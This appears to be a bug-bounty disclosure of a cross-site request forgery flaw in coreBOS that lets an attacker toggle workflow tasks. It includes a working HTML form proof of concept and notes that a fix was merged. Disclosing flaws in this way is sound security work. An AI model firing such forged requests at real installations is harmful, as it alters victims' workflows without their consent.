Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Oct 31st 2021


Description

Hey corebos team, in the meanwhile I find another low level CSRF.

attacker can activate/deactivate a Task of workflow with CSRF attack.

Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://ADDRESS/corebos/index.php">
      <input type="hidden" name="module" value="com&#95;vtiger&#95;workflow" />
      <input type="hidden" name="action" value="activatedeactivateTask" />
      <input type="hidden" name="workflow&#95;id" value="37" />
      <input type="hidden" name="active" value="1" />
      <input type="hidden" name="return&#95;url" value="index&#46;php&#63;module&#61;com&#95;vtiger&#95;workflow&amp;action&#61;editworkflow&amp;workflow&#95;id&#61;37&amp;return&#95;url&#61;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Joe Bordes validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on dcf503 a month ago
Joe Bordes has been awarded the fix bounty